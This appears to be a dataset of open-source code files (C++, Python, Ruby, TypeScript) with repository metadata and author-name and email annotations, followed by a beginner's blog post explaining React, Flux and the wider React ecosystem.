return SimplexNoiseScaled4D(x,y,z,w, (rangeMax - rangeMin), inFactor) + rangeMin;
}
|
C++
|
MIT
|
gaborpapp/UE4SimplexNoise/Source/SimplexNoise/Private/SimplexNoiseBPLibrary.cpp
|
19c6bbfe-3072-47c4-9159-d34554ce7819
|
[{"tag": "NAME", "value": "Stefan Gustavson", "start": 219, "end": 235, "context": "d and extended from the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal "}, {"tag": "NAME", "value": "Afan Olovcic", "start": 38, "end": 50, "context": "\ufeff/*\nSimplexNoise 1.0.0\n-----\nDevDad - Afan Olovcic @ www.art-and-code.com - 08/12/2015\n\nThis algorit"}, {"tag": "NAME", "value": "Ken Perlin", "start": 130, "end": 140, "context": "2/2015\n\nThis algorithm was originally designed by Ken Perlin, but my code has been\nadapted and extended from t"}, {"tag": "EMAIL", "value": "stegu@itn.liu.se", "start": 237, "end": 253, "context": "m the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal Engine 4\n\n\n* This "}]
|
[{"tag": "NAME", "value": "Stefan Gustavson", "start": 219, "end": 235, "context": "d and extended from the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal "}, {"tag": "NAME", "value": "Afan Olovcic", "start": 38, "end": 50, "context": "\ufeff/*\nSimplexNoise 1.0.0\n-----\nDevDad - Afan Olovcic @ www.art-and-code.com - 08/12/2015\n\nThis algorit"}, {"tag": "NAME", "value": "Ken Perlin", "start": 130, "end": 140, "context": "2/2015\n\nThis algorithm was originally designed by Ken Perlin, but my code has been\nadapted and extended from t"}, {"tag": "EMAIL", "value": "stegu@itn.liu.se", "start": 237, "end": 253, "context": "m the implementation written by Stefan Gustavson (stegu@itn.liu.se)\nand modified to fit to Unreal Engine 4\n\n\n* This "}]
|
#! /usr/bin/enc python
# -*- coding: utf-8 -*-
# author: Irving He
# email: 1910646@tongji.edu.cn
import logging
import argparse
import os
import random
import numpy as np
from tqdm import tqdm
import datetime
from datetime import timedelta
import torch
import torch.distributed as dist
from Data_utils import get_loader
from Data_utils import CONFIGS
from Model import VITransModel
from Utils import WarmupCosineSchedule,WarmupLinearSchedule
from Utils import set_seed, AverageMeter, simple_accuracy, model_save
from tensorboardX import SummaryWriter
def count_parameters(model):
params = sum(p.numel() for p in model.parameters() if p.requires_grad)
return params/1000000
"""Config"""
class VITConfig:
log_dir = "./TB_log/"
dataset = "cifar10" # "cifar100"
model_type = "ViT-B_16"
pretrained_dir = "./Pretrained/imagenet21k_ViT-B_16.npz" # 预训练模型存放位置
save_dir = "./Model/"
record_algo = "Pretrained_VIT_Cifar10_ViTB16_"
test_cycles = datetime.datetime.now().strftime('%Y%m%d_%H%M')
decay_type = "cosine" # "cosine", "linear" 决定了学习率Scheduler类型
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
TB_log = True
img_size = 224
train_batch_size = 64 #512
eval_batch_size = 32 #64
eval_every = 100 # Run prediction on validation set every so many steps.
learning_rate = 3e-2 # SGD起始学习率
weight_decay = 0 #
num_steps = 10000 # Total number of training epochs to perform.
warmup_steps = 500 # 开始的Warmup Step数
max_grad_norm = 1.0
local_rank = -1 # local_rank for distributed training on gpus
seed = 42
gradient_accumulation_steps = 1 # Number of updates steps to accumulate before performing a backward/update pass.
"""Model Valid Process"""
def valid(args,model,writer,test_loader,global_step):
"""
:param args: 参数Config
:param model: 需验证模型
:param writer: TB写入
:param test_loader: 测试数据集
:param global_step: 全局step
:return:
"""
# Validation
eval_losses = AverageMeter()
model.eval()
all_preds, all_label = [],[]
epoch_iterator = tqdm(test_loader,
desc="Validating... (loss=X.X)",
bar_format="{l_bar}{r_bar}",
dynamic_ncols=True)
loss_fct = torch.nn.CrossEntropyLoss()
global_eval_step = 0
for step, batch in enumerate(epoch_iterator):
global_eval_step += 1
batch = tuple(t.to(args.device) for t in batch)
x,y = batch
with torch.no_grad():
logits = model(x)[0]
eval_loss = loss_fct(logits,y)
eval_losses.update(eval_loss.item()) #滑动平均
preds = torch.argmax(logits,dim=-1)
if len(all_preds) == 0:
all_preds.append(preds.detach().cpu().numpy())
all_label.append(y.detach().cpu().numpy())
else:
# append在后面
all_preds[0] = np.append(all_preds[0], preds.detach().cpu().numpy(), axis=0)
all_label[0] = np.append(all_label[0], y.detach().cpu().numpy(), axis=0)
epoch_iterator.set_description("Validating... (loss=%2.5f)" % eval_losses.val)
writer.add_scalar("Train/loss", scalar_value=eval_losses.val, global_step=global_eval_step)
all_preds, all_label = all_preds[0], all_label[0]
# all_preds: numpy.array; all_label: numpy.array;
accuracy = simple_accuracy(all_preds,all_label)
writer.add_scalar("test/accuracy",scalar_value=accuracy,global_step=global_step)
return accuracy
"""Model Training Process"""
def train(args=VITConfig()):
"""
:param args:
- log_dir
"""
# 模型准备
pretrained_model_config = CONFIGS[args.model_type]
num_classes = 10 if args.dataset == "cifar10" else 100
model = VITransModel(pretrained_model_config, args.img_size, zero_head=True, num_classes=num_classes)
model.load_from(np.load(args.pretrained_dir))
model.to(device=args.device)
num_params = count_parameters(model)
if args.TB_log:
os.makedirs(args.log_dir, exist_ok=True)
writer = SummaryWriter(logdir=args.log_dir + args.record_algo + args.test_cycles)
args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps
# 1. DATA准备
train_loader, test_loader = get_loader(args)
# 2. 准备优化器以及Scheduler
optimizer = torch.optim.SGD(model.parameters(),
lr = args.learning_rate, # init lr
momentum=0.9,
weight_decay=args.weight_decay)
t_total = args.num_steps # Total time steps
if args.decay_type == "cosine":
scheduler = WarmupCosineSchedule(optimizer, warmup_steps=args.warmup_steps, t_total=t_total)
else:
scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args.warmup_steps, t_total=t_total)
# 3. Training
model.zero_grad()
set_seed(args.seed)
losses = AverageMeter()
global_step = 0
best_acc = 0
while True:
model.train()
# 一个数据迭代器
epoch_iterator = tqdm(train_loader,
desc="Training (X / X Steps) (loss=X.X)",
bar_format="{l_bar}{r_bar}",
dynamic_ncols=True)
for step, batch in enumerate(epoch_iterator):
batch = tuple(t.to(args.device) for t in batch)
x,y = batch # XData, YLabel
loss = model.forward(x,y)
loss.backward()
if (step+1)%args.gradient_accumulation_steps == 0:
losses.update(loss.item()*args.gradient_accumulation_steps)
torch.nn.utils.clip_grad_norm(model.parameters(),1.0)
scheduler.step()
optimizer.step()
optimizer.zero_grad()
global_step += 1
# Print Training Info
epoch_iterator.set_description(
"Training (%d / %d Steps) (loss=%2.5f)" % (global_step, t_total, losses.val)
)
writer.add_scalar("Train/loss",scalar_value=losses.val, global_step=global_step)
writer.add_scalar("Train/lr", scalar_value=scheduler.get_lr()[0], global_step=global_step)
# Valid ...
if global_step % args.eval_every == 0:
accuracy = valid(args, model, writer, test_loader, global_step)
if best_acc < accuracy:
best_acc = accuracy
model_save(args.record_algo+args.test_cycles,model)
model.train()
if global_step % t_total == 0:
break
losses.reset()
if global_step % t_total == 0:
break
writer.close()
print("==="*30)
print("Best Accuracy: \t%f" % best_acc)
print("End Training!")
print("==="*30)
if __name__ == "__main__":
train()
# all_preds = []
# all_labels = []
#
# all_pred = torch.tensor([1,0,1,1,0,1])
# all_label = torch.tensor([1,1,1,1,1,1])
#
# all_preds.append(all_pred)
# all_labels.append(all_label)
# print(all_preds)
# all_preds[0] = np.append(all_preds[0],all_label,axis=0)
# all_labels[0] = np.append(all_labels[0],all_pred,axis=0)
# print(type(all_preds[0]))
# print(type(all_labels[0]))
# acc = simple_accuracy(all_preds[0],all_labels[0])
# print(acc)
|
Python
|
MIT
|
HzcIrving/DLRL-PlayGround/VIT/Train.py
|
e5d12dd2-a9b4-472b-9317-c64d69ce7d31
|
[{"tag": "EMAIL", "value": "1910646@tongji.edu.cn", "start": 77, "end": 98, "context": "- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\nimport argparse\nimport os\nimport "}, {"tag": "NAME", "value": "Irving He", "start": 57, "end": 66, "context": "/bin/enc python\n# -*- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\ni"}]
|
[{"tag": "EMAIL", "value": "1910646@tongji.edu.cn", "start": 77, "end": 98, "context": "- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\nimport argparse\nimport os\nimport "}, {"tag": "NAME", "value": "Irving He", "start": 57, "end": 66, "context": "/bin/enc python\n# -*- coding: utf-8 -*-\n# author: Irving He \n# email: 1910646@tongji.edu.cn\n\nimport logging\ni"}]
|
cask 'lockrattler' do
version '4.15,2018.11'
sha256 '6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9'
# eclecticlightdotcom.files.wordpress.com was verified as official when first introduced to the cask
url "https://eclecticlightdotcom.files.wordpress.com/#{version.after_comma.dots_to_slashes}/lockrattler#{version.before_comma.major}#{version.before_comma.minor}.zip"
name 'Lock Rattler'
homepage 'https://eclecticlight.co/'
depends_on macos: '>= :el_capitan'
app "lockrattler#{version.before_comma.major}#{version.before_comma.minor}/LockRattler.app"
end
|
Ruby
|
BSD-2-Clause
|
JamesChevalier/homebrew-cask/Casks/lockrattler.rb
|
32d727fd-5122-424c-b28f-f4c701d16411
|
[{"tag": "SSH_KEY", "value": "6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9", "start": 57, "end": 121, "context": "ockrattler' do\n version '4.15,2018.11'\n sha256 '6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9'\n\n # eclecticlightdotcom.files.wordpress.com was"}]
|
[{"tag": "KEY", "value": "6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9", "start": 57, "end": 121, "context": "ockrattler' do\n version '4.15,2018.11'\n sha256 '6622386f8d83dc9efefb8c03a4dbfc18e7928d89ffc2ec3e2feb9473e8f410c9'\n\n # eclecticlightdotcom.files.wordpress.com was"}]
|
/*
* Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#include "q3dvertex.h"
#include <QColor>
Q3DVertex::Q3DVertex(const QVector3D& position, const Q3DColor& color) noexcept :
_position(position),
_color(color)
{
}
const QVector3D& Q3DVertex::position() const noexcept
{
return _position;
}
void Q3DVertex::setPosition(const QVector3D& position) noexcept
{
_position = position;
}
const Q3DColor& Q3DVertex::color() const noexcept
{
return _color;
}
void Q3DVertex::setColor(const Q3DColor& color) noexcept
{
_color = color;
}
|
C++
|
MIT
|
GValiente/pcps/3rd_party/q3dobserver/lib/src/q3dvertex.cpp
|
8d9a3de4-33a7-44da-97c7-3a9659623ac6
|
[{"tag": "EMAIL", "value": "gustavo.valiente@protonmail.com", "start": 42, "end": 73, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This software is provided 'as-is', without "}, {"tag": "NAME", "value": "Gustavo Valiente", "start": 25, "end": 41, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This softwa"}]
|
[{"tag": "EMAIL", "value": "gustavo.valiente@protonmail.com", "start": 42, "end": 73, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This software is provided 'as-is', without "}, {"tag": "NAME", "value": "Gustavo Valiente", "start": 25, "end": 41, "context": "/*\n * Copyright (c) 2018 Gustavo Valiente gustavo.valiente@protonmail.com\n *\n * This softwa"}]
|
/**
* @file main.cpp
* @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)
* @brief Main node that processes an input image and assign goal points to all robots in swarm based off of user input. This implementation uses the RefineGoalPoints method of the ImageProcessor Class.
* @version 0.1
* @date 2021-12-11
* @copyright Copyright (c) 2021
*
* Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this
* software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
*/
#include "../include/swarm_server.h"
#include "../include/image_processor.h"
int main(int argc, char** argv) {
if (argc <= 1) {
ROS_WARN_STREAM
("Enter the # of Robots (robots_) and absolute Image File Path.");
return 1;
}
ros::init(argc, argv, "main");
// Process the image
cv::Mat image = cv::imread(argv[2]);
auto img = new ImageProcessor(image);
auto bin = img->GetEdges();
img->RefineGoalPoints(std::atoi(argv[1]), bin);
auto points = img->TransformToMapCoordinates();
ROS_INFO_STREAM("Got " << points.size() << " goal points!");
// Publish the goal points to the robots
SwarmServer swarm;
swarm.num_agents = std::atoi(argv[1]);
ROS_INFO_STREAM("Kernel size: " << img->GetKernalSize());
swarm.AssignGoals(points);
}
|
C++
|
BSD-3-Clause
|
ShonBC/allstar/src/main.cpp
|
d304f89b-ef5a-4a5f-86cf-04b64e9e57df
|
[{"tag": "NAME", "value": "Pooja Kabra", "start": 102, "end": 113, "context": "s3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node tha"}, {"tag": "NAME", "value": "Shon Cortes", "start": 33, "end": 44, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@um"}, {"tag": "NAME", "value": "Sameer Pusegaonkar", "start": 65, "end": 83, "context": "in.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.um"}, {"tag": "EMAIL", "value": "sameer@umd.edu", "start": 85, "end": 99, "context": "on Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief"}, {"tag": "EMAIL", "value": "pkabra@terpmail.umd.edu", "start": 115, "end": 138, "context": "Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node that processes an input imag"}, {"tag": "EMAIL", "value": "scortes3@umd.edu", "start": 46, "end": 62, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabr"}]
|
[{"tag": "NAME", "value": "Pooja Kabra", "start": 102, "end": 113, "context": "s3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node tha"}, {"tag": "NAME", "value": "Shon Cortes", "start": 33, "end": 44, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@um"}, {"tag": "NAME", "value": "Sameer Pusegaonkar", "start": 65, "end": 83, "context": "in.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.um"}, {"tag": "EMAIL", "value": "sameer@umd.edu", "start": 85, "end": 99, "context": "on Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief"}, {"tag": "EMAIL", "value": "pkabra@terpmail.umd.edu", "start": 115, "end": 138, "context": "Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabra (pkabra@terpmail.umd.edu)\n * @brief Main node that processes an input imag"}, {"tag": "EMAIL", "value": "scortes3@umd.edu", "start": 46, "end": 62, "context": "/**\n * @file main.cpp\n * @author Shon Cortes (scortes3@umd.edu), Sameer Pusegaonkar (sameer@umd.edu), Pooja Kabr"}]
|
#!/usr/bin/env node
/**
* Copyright (c) 2018-2019 mol* contributors, licensed under MIT, See LICENSE file for more info.
*
* Taken/adapted from DensityServer (https://github.com/dsehnal/DensityServer)
*
* @author David Sehnal <david.sehnal@gmail.com>
* @author Alexander Rose <alexander.rose@weirdbyte.de>
*/
import * as fs from 'fs';
import { configureLocal } from './config';
import * as LocalApi from './server/local-api';
const config = configureLocal();
if (config.jobsTemplate) {
const exampleJobs: LocalApi.JobEntry[] = [{
source: {
filename: `g:/test/mdb/xray-1tqn.mdb`,
name: 'xray',
id: '1tqn',
},
query: {
kind: 'box',
space: 'cartesian',
bottomLeft: [-42.996, -64.169, -45.335],
topRight: [8.768, 15.316, 21.599]
},
params: {
forcedSamplingLevel: 2,
asBinary: true
},
outputFolder: 'g:/test/local-test'
}, {
source: {
filename: `g:/test/mdb/emd-8116.mdb`,
name: 'em',
id: '8116',
},
query: {
kind: 'cell'
},
params: {
detail: 4,
asBinary: true
},
outputFolder: 'g:/test/local-test',
outputFilename: '8116_cell.bcif'
}];
console.log(JSON.stringify(exampleJobs, null, 2));
process.exit();
}
async function run() {
let jobs: LocalApi.JobEntry[];
try {
if (!config.jobs) {
throw new Error(`Please provide 'jobs' argument. See [-h] for help.`);
}
jobs = JSON.parse(fs.readFileSync(config.jobs, 'utf-8'));
} catch (e) {
console.error('' + e);
return;
}
await LocalApi.run(jobs);
}
run();
|
TypeScript
|
MIT
|
azangru/molstar/src/servers/volume/query.ts
|
2db113b5-5b1d-4d6e-878a-46230b85e43a
|
[{"tag": "NAME", "value": "Alexander Rose", "start": 267, "end": 281, "context": " David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs"}, {"tag": "NAME", "value": "David Sehnal", "start": 218, "end": 230, "context": "//github.com/dsehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Ros"}, {"tag": "EMAIL", "value": "david.sehnal@gmail.com", "start": 232, "end": 254, "context": "sehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdb"}, {"tag": "EMAIL", "value": "alexander.rose@weirdbyte.de", "start": 283, "end": 310, "context": "avid.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs from 'fs';\nimport { configur"}]
|
[{"tag": "NAME", "value": "Alexander Rose", "start": 267, "end": 281, "context": " David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs"}, {"tag": "NAME", "value": "David Sehnal", "start": 218, "end": 230, "context": "//github.com/dsehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Ros"}, {"tag": "EMAIL", "value": "david.sehnal@gmail.com", "start": 232, "end": 254, "context": "sehnal/DensityServer)\n *\n * @author David Sehnal <david.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdb"}, {"tag": "EMAIL", "value": "alexander.rose@weirdbyte.de", "start": 283, "end": 310, "context": "avid.sehnal@gmail.com>\n * @author Alexander Rose <alexander.rose@weirdbyte.de>\n */\n\nimport * as fs from 'fs';\nimport { configur"}]
|
## react ecosystem : react, redux, relay, graphql, react-native
I have given sometime to explore react ecosystem from last friday. Yet react is a big technology stack to learn completely in one week, I wanted to understand the core concepts behind it. I have bit of experience in full-stack web apps using SAP technologies(past 3 years): webdypro applications(frontend is drag and drop UI library + backend completely in ABAP); CRM webui ; Hybris(an e-commerce platform - front end is java & js stack + backend is SAP CRM); extensive experience in webservices and API's; bit of learned knowledge on Fiori app development using SAPUI5 library on HCP. My curiousnes of learning has drawn me towards open source libraries and frameworks. I have been fascinated by concept of open source and its potential impact in the world of computer technologies; I have started exploring it bit-by-bit.
I always follow my below table to get a gist of anything new in technology:
____________________________
| Hacker News | Medium | Reddit | Quora-QA | Stack-Overflow QA| Awesome-gh | Online-Courses (lynda.com)| Official-Docs |
| ------------- |:-------------:| -----:| -----:|-----:|-----:|-----:| -----:|
| [react](https://hn.algolia.com/?query=react&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [react](https://medium.com/tag/react?source=related) | [react](https://www.reddit.com/r/reactjs/) | [react](https://www.quora.com/topic/React-JavaScript-library) | [react](https://stackoverflow.com/search?q=react) | [react](https://github.com/enaqx/awesome-react) | [react](https://www.lynda.com/React-js-training-tutorials/7049-0.html) | [react](https://reactjs.org/) |
| [redux](https://hn.algolia.com/?query=redux&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [redux](https://medium.com/tag/redux) | [redux](https://www.reddit.com/r/reduxjs/) | [redux](https://www.quora.com/topic/Redux-JavaScript-library) | [redux](https://stackoverflow.com/search?q=redux) | [redux](https://github.com/xgrommx/awesome-redux) | [redux](https://www.lynda.com/Redux-tutorials/11496-0.html) | [redux](http://redux.js.org/) |
| [relay](https://hn.algolia.com/?query=relay&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [relay](https://medium.com/tag/relay) | [relay](https://www.reddit.com/r/relay/) | [relay](https://www.quora.com/topic/Relay-JS-Framework) | [relay](https://stackoverflow.com/search?q=relay) | [relay](https://github.com/expede/awesome-relay) | [realy](https://www.lynda.com/GraphQL-tutorials/650000-0.html) | [relay](https://facebook.github.io/relay) |
| [graphql](https://hn.algolia.com/?query=graphql&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [graphql](https://medium.com/tag/graphql) | [graphql](https://www.reddit.com/r/graphql/) | [graphql](https://www.quora.com/topic/GraphQL) | [graphql](https://stackoverflow.com/search?q=graphql) | [graphql](https://github.com/chentsulin/awesome-graphql) | [graphql](https://www.lynda.com/GraphQL-tutorials/650000-0.html) | [graphql](http://graphql.org/) |
| [react-native](https://hn.algolia.com/?query=react%20native&sort=byPopularity&prefix&page=0&dateRange=all&type=story) | [react-native](https://medium.com/tag/react-native) | [react-native](https://www.reddit.com/r/reactnative/) | [react-native](https://www.quora.com/topic/React-Native-1) | [react-native](https://stackoverflow.com/search?q=react+native) | [react-native](https://github.com/jondot/awesome-react-native) | [react-native](https://www.lynda.com/React-Native-tutorials/11718-0.html) | [react-native](https://facebook.github.io/react-native/) |
********************************************************
*******************************************************
React is an elegant JavaScript library for building frontend user interfaces. React allows developers to create large web-applications that use data and can change over time without reloading the page. It aims primarily to provide speed, simplicity, and scalability. React processes only user interfaces in applications. This corresponds to View in the Model-View-Controller (MVC) pattern, and can be used in combination with other JavaScript libraries or frameworks in MVC, such as AngularJS. [Source : wikipedia]
React was created by Jordan Walke, a software engineer at Facebook. He was influenced by Angular and XHP, an HTML component framework for PHP. It was first deployed on Facebook's newsfeed in 2011 and later on Instagram.com in 2012. It was open-sourced at JSConf US in May 2013.
React is maintained by Facebook, Instagram and a community of individual developers and corporations.
There are almost 2K blogs,articles and tutorials teaching about react every month and it is most trending buzz word in hacker news commuinity. Stack Overflow has released its much-anticipated Developer Survey for 2017. This year, over 64,000 developers took part in the survey and shared their preferences. below are the stats for survey on frameworks and libraries; react stands in the top list.

React has been adopted by top giants Facebook, Instagram, NetflixNY, Times, Khan Academy, Codecademy, WhatsApp, Vivaldi Browser, Dropbox, Yahoo Mail, many [more](https://github.com/facebook/react/wiki/sites-using-react) startups and it is going to take over the web.
React is just a front-end UI library, in order to build a complete full stack react application we will have to use supporting frameworks. Facebook and other communities provides supporting libraries and frameworks, such as flux, redux, relay, graphql. React can also be used with other frameworks ex: angularjs.
Lets explore them in details...
## React:
As explained already react is only the View layer, which is means you have only the V in the MVC — Model-View-Controller architecture. All the while we see that React is mentioned along with other frameworks, but it offers just the View. React views are typically rendered using components that contain additional components specified as custom HTML tags.
React gives us the template language and a few function hooks to render HTML. Since it is component based, we can compose an application with React, and just specify how we want our component to look like.
React will keep it updated; even the underlying data changes. The core principles of React are (1) Flexibility, (2) Efficiency and (3) Declarative code.
As React is flexible, we can use it in several projects, create new apps and even use it within the existing code base, without doing a rewrite. React is efficient becuase it uses virtual DOM. The virtual DOM compares the current setup to the desired setup, and only makes the minimal amount of changes required to get there. Being efficient is increasingly important in the new world of mobile devices: it helps conserve battery power as well as create a faster and more pleasant user experience.

The reason behind to build React.js :
* React is not a MVC framework : React is a library for building composable user interfaces..
* React doesn’t use templates : React uses a real, full featured programming language to render views, which we see as an advantage over templates for a few reasons:
* JavaScript is a flexible, powerful programming language with the ability to build abstractions. This is incredibly important in large applications.
* By unifying your markup with its corresponding view logic, React can actually make views easier to extend and maintain.
* By baking an understanding of markup and content into JavaScript, there’sno manual string concatenation and therefore less surface area for XSS vulnerabilities. JSX, an optional syntax extension, is also created if in case you prefer the readability of HTML to raw JavaScript.
* React updates are very simple : When your component is first initialized, the method is called, generating a lightweight representation of your view. From that representation, a string of markup is produced, and injected into the document. When your data changes, the method is called again. In order to perform updates as efficiently as possible, we diff the return value from the previous call to render with the new one, and generate a minimal set of changes to be applied to the DOM(Document Object Model).
In simple words ,for example : In your facebook page, you don’t have to refresh every time to get a new notification. it just updates without that.
* Because React has its own lightweight representation of the document, we can do some pretty cool things with it:
* Facebook has dynamic charts that render to instead of HTML.
* Instagram is a “single page” web app built entirely with React and.
* They have built internal prototypes that run React apps in a web worker and use React to drive native iOS views via an Objective-C bridge.
* You can run React on the server for SEO, performance, code sharing and overall flexibility.
Events behave in a consistent, standards-compliant way in all browsers (including IE8) and automatically use event delegation.
There are few pre-requesites and key-concepts we need to master before we start with building apps.
Familiarity with HTML, JavaScript and ECMAScript6 (ES6).
and the key concepts are:
* Components
* JSX
* Props & State
* The Component API
* Component Types
This blogpost [Master these five concepts, then master React](https://medium.freecodecamp.org/the-5-things-you-need-to-know-to-understand-react-a1dbd5d114a3) gives complete overview on above five key-concepts.
Brief summary:
* A React codebase is made up of components.
* These components are written using JSX.
* Data flows from parent to children, except when it comes to state, which originates inside a component.
* Components possess a small set of lifecycle and utility methods.
* Components can also be written as pure functions.
* You should keep data logic and UI logic in separate components.
* Higher-order components are a common pattern for giving a component access to new tools.
More on react basics:
* [All the fundamental React.js concepts, jammed into this single Medium article](https://medium.freecodecamp.org/all-the-fundamental-react-js-concepts-jammed-into-this-single-medium-article-c83f9b53eac2)
* [How Virtual-DOM and diffing works in React](https://medium.com/@gethylgeorge/how-virtual-dom-and-diffing-works-in-react-6fc805f9f84e)
* [react-basic](https://github.com/reactjs/react-basic)
**What is Flux?**
-------
We learnt that React takes care of V or the View part in MVC. Now, what about the M or the Model part? Flux, a programming pattern takes care of the M in the MVC.
It is the architecture responsible for creating data layers in JavaScript applications and building client-side web applications. Flux complements React’s Composable view components through its unidirectional data flow.
We can also say that Flux is more of a pattern, than a framework and it has four main components (we will go in depth later):
* Dispatcher
* Stores
* Views (React components)
* Action
This is not like the general MVC that you see in other frameworks. But yes, there are Controllers, but they are mostly Controller views. Views are at the top of the hierarchy and they retire the data and functionality and pass them down to their children.
Flux follows the concept of unidirectional data flow making it much easier to zero in of where the error lies. The data goes through a strict pipeline through your application. React and Flux are actually two of the most popular frameworks that follow the concept of unidirectional data flow.
While React makes uses of a virtual DOM object to render changes, Flux does it differently. In Flux, the interactions with user interface will trigger a series of actions that would alter the application data. The View will get alerts on the changes.

**Flux vs. MVC**
Now that we have both MVC and Flux patterns, the next question would be which one is a better choice. Let’s go a little deeper into this:
There are different kinds of MVC patterns, but the basic concept of each one remains the same:
* Model — Maintains the behavior & data of an application domain
* View — The display of the model in UI
* Controller — Uses the user input, manipulate the model & update the view

The main problem with MVC is that it doesn’t scale well for Facebook’s huge code base. Flux proved to be a better choice because it is all about tweaking the flow inside the app. MVC has stood the test of time, and ever since its launch in 1976, it has been the favorite for many developers. Even in the recent years, developers have been using for several projects. But MVC couldn’t handle code base that Facebook needed, and hence Flux started ruling the roost.
Let’s take a look at the main factors due to which Flux has an upper hand over MVC design pattern.
The Flow — Flux is quite strict about the flow of application. The data Dispatcher puts forth some strict rules and exceptions to govern the flow. There is no such thing in MVC, and the flows are implemented differently.

Unidirectional Flow in Flux — While MVCs are bidirectional in their flow, in Flux, all the changes goes in the same direction through data Dispatcher. The Store cannot change by itself, this is the same concept for all other Actions. Changes to be made have to go through the Dispatcher through Actions.
Store — While MVC cannot model single objects, Flux can do it to store any application related data.
When it comes to choosing Flux or MVC, Flux would be a better choice because it is very easy to understand and works with very minimum code usage. Flux allows you to structure your app effectively.
